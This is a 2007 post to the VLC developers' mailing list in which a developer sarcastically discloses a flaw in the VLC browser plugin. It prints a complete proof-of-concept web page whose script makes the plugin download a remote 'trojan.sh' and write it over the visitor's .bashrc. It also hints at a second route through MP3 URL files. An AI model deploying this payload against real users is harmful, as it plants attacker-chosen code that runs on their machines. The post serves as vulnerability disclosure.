[vlc-devel] Regarding "obscure" security problem
Rémi Denis-Courmont
rdenis at simphalempin.com
Wed Dec 26 15:50:45 CET 2007
Good news everyone!
As pointed out a LOOONG time ago by DamienF, a.k.a. ticket #1371:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<title>VLC browser plugin file overwrite page</title>
</head>
<body>
<embed type="application/x-vlc-plugin"
pluginspage="http://www.videolan.org"
version="VideoLAN.VLCPlugin.2"
width="640"
height="480"
id="vlc">
</embed>
<script type="text/javascript"><!--
var vlc = document.getElementById("vlc");
var src = "http://www.example.com/trojan.sh";
var dst = ".bashrc";
vlc.playlist.add (src, "File", ":demux=dump :demuxdump-file=" + dst);
vlc.playlist.play ();
//!--></script>
</body>
</html>
I leave as an exercise to the reader to find out how to do the exact
same thing using EXTVLCOPT inside a MP3 URL file.
Of course, I shall not fix this, otherwise I would further get on
someone's nerves and in the way of usability. Instead, I'll simply run
the following command and let every other VLC users screwed:
# sudo apt-get remove --purge mozilla-plugin-vlc
Thank you for your attention, I hope you are enjoying the end of the
year at least as much as I do.
--
Rémi Denis-Courmont
feeling sarcastic for some reason
More information about the vlc-devel
mailing list